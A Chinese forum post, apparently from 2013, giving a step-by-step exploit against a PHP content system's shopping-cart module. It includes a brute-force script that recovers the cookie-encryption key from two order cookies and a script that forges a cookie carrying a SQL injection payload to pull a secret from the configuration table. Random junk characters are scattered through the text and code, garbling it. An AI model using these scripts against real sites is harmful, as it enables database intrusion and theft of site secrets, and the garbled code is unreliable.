www.xxx.com/plus/search.php?keyword=
' F; K/ P9 G9 P在 include/shopcar.class.php中
) p2 j, j0 b( E: ?先看一下这个shopcar类是如何生成cookie的' m& U: T, {) z0 x% v
239 function saveCookie($key,$value)8 _( g, z% D# a- z: I1 F
240 {% h* y+ ~! E% ^3 Y0 t
241 if(is_array($value))
: H* h% R1 ?& G7 B/ ~242 {- `1 C. e) s$ Z( ~, q
243 $value = $this->enCrypt($this->enCode($value));
, p; s$ ?0 ~' d' X244 }
7 }9 B2 {- Q; e- S245 else" j% a! {3 R( b; K
246 {& Z% h$ ~" W0 q/ [( |" w1 g" F% d
247 $value = $this->enCrypt($value);
0 P) K3 T, @6 Y& H248 }2 g+ S( R. A( o5 f: L; j, u
249 setcookie($key,$value,time()+36000,’/');6 R: n; F7 t$ D" @* [1 a0 ^
250 }0 j* Y9 i5 F, v! J* f2 M
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
$ r. l7 G, r8 w! m" H186 function enCrypt($txt)( N: M- L1 N5 q( t( r; o0 I( f
187 {
6 W+ W/ L) \7 K8 P' x$ `, s188 srand((double)microtime() * 1000000);
: d' `- {* O4 A3 n" m189 $encrypt_key = md5(rand(0, 32000));4 c3 C5 |- G0 B7 {* j
190 $ctr = 0;' i: }5 i0 ^' K/ ]( D7 q4 z% E
191 $tmp = ”;8 u- U7 I$ }; c9 A# Q6 J; p! ~+ Z# e' u
192 for($i = 0; $i < strlen($txt); $i++)
" X3 Q0 y$ W+ { ]# j& \; B193 {) d- |- E: s/ K# |8 Z
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
3 U5 F1 F$ l& p1 t8 P195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);3 B# ]" m5 I/ b1 z- l* S
196 }
# i3 `! P8 L7 q1 \; }+ b197 return base64_encode($this->setKey($tmp));
' }& T, s+ _. b5 u( }6 `5 R198 }5 u1 M* O4 r/ c6 {2 \8 ]) K ]
213 function setKey($txt)6 v2 P/ ~0 @& L( Y# p
214 {
- v M6 Q$ a" w0 _( r215 global $cfg_cookie_encode;
9 o; }+ A1 J; u7 J" c" @216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
3 Z4 ?4 r: S# h: Z C6 A217 $ctr = 0;
+ c9 p' C# h% N- h' R/ m( s4 l218 $tmp = ”;% g; N& Y: l0 O/ Q1 W1 ?; R
219 for($i = 0; $i < strlen($txt); $i++)
) W. [' w6 y3 k4 ?8 o220 {: P- ~5 Z. ? y0 r; F' ~7 x. x
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;) G7 w+ g3 F! L3 a+ } g( I
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];/ R$ P3 E+ w1 e& m8 R3 ~; b
223 }% w7 A" _1 q F
224 return $tmp;' E( G) _# J* Z
225 }) D3 B! N! u5 @6 l1 I- ?& w
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的$ y9 T2 L$ `2 { c8 H5 P* m1 A
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
- K2 _, R' D1 _4 H! c具体代码如下:& C" t( T8 [+ O3 O& c& s
<?php# T! d2 C( }. [$ z4 [& j
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here* t, ~5 Y3 F5 o. T
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
/ ]& ^0 D8 w# v/ r3 Q) y* ?$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
) n+ `6 |" C. o0 }" ^function reStrCode($code,$string)# U* r) X. ]. d! i- u1 l$ K- B0 K7 o
{ g; o7 x" D1 i
$code = base64_decode($code);
8 F$ o0 ?% ^; N8 K, P$key = “”;' G; Q% X/ M3 ~% e6 T2 D- D
for($i=0 ; $i<32 ; $i++)
* p% [; J5 o. \{4 w$ C1 y+ R. ?1 h' \
$key .= $string[$i] ^ $code[$i];
, N. C) l! w* G" T- P, w}
2 @# L7 j" W i7 r; }2 T6 `return $key; ], l, m4 {: S2 W
}2 m; }6 l: }5 Y) ~; R/ y& M
function getKeys($cookie,$plantxt)& v: b2 i- y2 J9 ^0 j3 ^8 S
{
: o% K6 t' X3 d5 J$tmp = $cookie;3 z: `- r7 z6 l% u7 T3 [
$results = array(); |+ |1 _0 H$ Y& M
for($j=0 ; $j < 32000; $j++)% Q' E6 ~8 c7 |
{, q K6 U3 C. v1 v9 l
% ]. h- Y3 b3 K! j$txt = $plantxt;
: d. A% W9 n# K _2 o0 E6 \$ctr = 0;
9 o' y) ~+ ~+ u/ M3 I$tmp = ”;
9 M! J# E, X4 w+ L: `1 h- p/ |1 W6 i4 U$encrypt_key = md5($j);% j- W% u" I5 O$ J7 W
for($i =0; $i < strlen($txt); $i ++) h l& ~5 ^. D6 P6 _
{; e2 ^# t4 ?, k" J
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
5 E. d. N9 z1 m. z+ x$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]); F& R7 M4 P& R4 |- m
}& ^+ n) ]3 N# T. ^
$string = $tmp;5 o2 S6 r/ v4 l7 `: d
$code = $cookie;" q5 ~. b, `( A! Y' i) c% A
$result = reStrCode($code,$string);0 m7 w3 R$ t. ~' A, K
if(eregi(‘^[a-z0-9]+$’,$result)). ^8 @/ ?6 V4 W. i
{1 f# E" J( G4 t) D1 r. a
echo $result.”\n”;+ l4 K E" A2 h2 S+ t, f
$results[] = $result;% G: v/ k! X/ ^* @: L
}
, I0 C' k2 V8 z5 {% Z M0 V/ _8 U}% M, [/ ^( F3 r2 X9 r9 o
return $results;
& U4 Q% @8 w A8 K v9 w; N3 v}8 z! s9 J) m2 T% i7 l/ e8 P
$results1 = getKeys($cookie1,$plantxt);
0 E, I6 k+ [. B; G$results2 = getKeys($cookie2,$plantxt);( q/ z; z7 R8 j2 S3 c, U5 h
print “\n——————–real key————————–\n”;: f1 g+ Y7 H" l
foreach($results1 as $test1)
: k T" L5 T5 [7 ~1 _- ^9 W{- S0 H/ x0 w K& X
foreach($results2 as $test2)
3 ]- ?. `. M' m) R! x{$ S5 D( g0 { q& S! M0 @3 i0 |
if($test1 == $test2)8 T/ I+ U& T* d5 j& p$ b
{
! H0 A6 H! ^' E; {" J& G xecho $test1.”\n”;8 v; e) D; P5 z
}( X- R$ e0 W3 z4 [- S6 j
} ]# h( Z7 V& o! P$ F3 f: ]
}* G' C( b# ?! j4 X _' s
?>
3 w, B( y1 Y; R/ K1 E1 kcookie1 和 cookie2 是我下了两次订单后分别生成的cookie,8 d2 _) @! K2 Z2 c; Q
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua11 x$ D$ I" l- R$ I+ a" Z, W
然后推算出md5(strtolower($cfg_cookie_encode)), c5 F5 U0 e& p8 c/ I9 @: a8 {( s! x6 o
得到这个key之后,我们就可以构造任意购物车的cookie
) ?, \* B. [; E" x7 j' L接着看2 B1 m8 n. D' [. Q5 a
20 class MemberShops
/ g2 \8 f0 J) z8 K% Z21 {" X. [/ \. M a U- H: M: R2 M' N
22 var $OrdersId;3 q7 h; H9 q; l6 v# S
23 var $productsId;9 h, Y/ Z; e$ y7 W0 I* e
247 _% D$ o: N7 @) C; B
25 function __construct()8 o* \/ p0 H4 F
26 {
# B/ R1 [, l0 b1 I: `1 C$ b27 $this->OrdersId = $this->getCookie(“OrdersId”);
! \% d9 n! `- D% p' B. ^28 if(empty($this->OrdersId))# t# F( `; \ e$ H4 r
29 {, c1 a5 M6 Z& R2 M
30 $this->OrdersId = $this->MakeOrders();' I0 T2 {; n6 ]- T1 ], ] t
31 }
+ x# V3 I" w9 f32 }& n; P: }1 Z# p6 o7 A
发现OrderId是从cookie里面获取的
( s: [5 I) i: b* K然后
% O; N; U" B ]/plus/carbuyaction.php中的* ]; g6 R! |7 `0 @! y1 D
29 $cart = new MemberShops();
5 \; v) P( k+ ], L5 Z39 $OrdersId = $cart->OrdersId; //本次记录的订单号: o6 `, A8 w C" g
……
. ]- c9 i8 s& E! E9 _173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);- D- E+ q- Q% ~ s p
接着我们就可以注入了
$ ~5 C8 j7 L# ~7 q( j- r1 G通过利用下面代码生成cookie:% b* `8 r, X# T: t4 h3 n* Z
<?php
& _& o+ h8 ^. g0 X. y" J- Z$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
* R: {/ ?+ W( \8 c# C# D9 h b( A. p$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
' c5 q* [) N5 ifunction setKey($txt)
: T" o4 c0 u0 S# [! X0 f{# n, q: d7 O$ m: }
global $encrypt_key;
! x% L" b: @) @$ctr = 0; M: ?6 N% Y& z; j8 Q* ^
$tmp = ”;
* k4 f6 N* |' i$ t$ g5 f: }for($i = 0; $i < strlen($txt); $i++); M) a: Y! ]3 Y* b1 F% ]
{8 i% `/ P; a C3 z1 M& d
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
; M1 f+ \1 i6 u8 G$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
. y0 z4 f3 @) ~) Q/ f}
$ q: l! o! _9 r9 h$ |6 |1 T, ?% Lreturn $tmp;
0 u+ x" M! m4 C$ d5 u) W% P# q; i}6 v9 C X. x, R8 D
function enCrypt($txt)
o, V8 ~" }6 r+ Y{
+ @5 X5 s8 `% lsrand((double)microtime() * 1000000);
- k/ B; J$ d4 J! g ~5 ` I, J$encrypt_key = md5(rand(0, 32000));6 M/ \4 k& K4 h
$ctr = 0;) \: {& ]' B5 \" C3 `& [# }
$tmp = ”;
) C- F/ i# R- J. q9 B6 U9 L1 wfor($i = 0; $i < strlen($txt); $i++)
% i, q% T$ I+ f) T% F$ I8 {{8 `, r& ?9 j y9 h+ ~6 M
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;6 a M8 d/ l1 t/ _& I2 p& ~
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
+ j: V3 s. I1 ~7 J. X7 @, }; p}& T. b$ r7 v# h# N( a! f' j
return base64_encode(setKey($tmp));
/ o+ a# W: e2 y}
% L0 S5 {, \9 n6 T; M' jfor($dest =0;$dest = enCrypt($txt);)) c3 |, s8 z& q% r+ c c
{* \2 C J+ H5 C: L
if(!strpos($dest,’+'))) X2 f1 _; ~# r
{2 ^8 r2 |8 }* G( Z2 R
break;
9 T8 r. K8 _1 Z% s; [+ s}
1 R. C$ c" o' |- K}" c9 t+ i$ Z2 i" e. Z
echo $dest.”\n”;
! Z9 d$ Z' l5 ~?>
& o" ^9 o- F6 L: v- V! B4 I; l& w# W$ X, d2 d3 l
|
发表于 2013-2-13 23:58:29
收藏
支持
反对